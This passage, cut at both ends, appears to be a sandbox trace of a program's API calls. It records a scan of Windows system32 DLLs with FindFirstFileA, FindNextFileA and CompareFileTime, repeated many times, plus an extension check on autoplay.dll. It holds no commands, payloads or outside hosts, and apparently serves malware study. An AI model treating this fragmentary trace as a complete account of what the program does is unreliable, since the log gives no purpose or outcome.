(hObject=0x178) returned 1 [0206.569] StrRChrA (lpStart="C:\\Windows\\system32\\c_1252.nls", lpEnd=0x0, wMatch=0x5c) returned="\\c_1252.nls" [0206.569] lstrcatA (in: lpString1="C:\\Windows\\system32", lpString2="\\*.dll" | out: lpString1="C:\\Windows\\system32\\*.dll") returned="C:\\Windows\\system32\\*.dll" [0206.569] FindFirstFileA (in: lpFileName="C:\\Windows\\system32\\*.dll", lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 0x59e830 [0206.569] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.569] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.570] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.570] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.571] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.571] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.572] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.572] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] StrChrA (lpStart="autoplay.dll", wMatch=0x2e) returned=".dll" [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.573] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.573] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.574] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.574] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 [0206.575] FindNextFileA (in: hFindFile=0x59e830, lpFindFileData=0x1eafd58 | out: lpFindFileData=0x1eafd58) returned 1 [0206.575] CompareFileTime (lpFileTime1=0x1eafd6c, lpFileTime2=0x1eafeac) returned -1 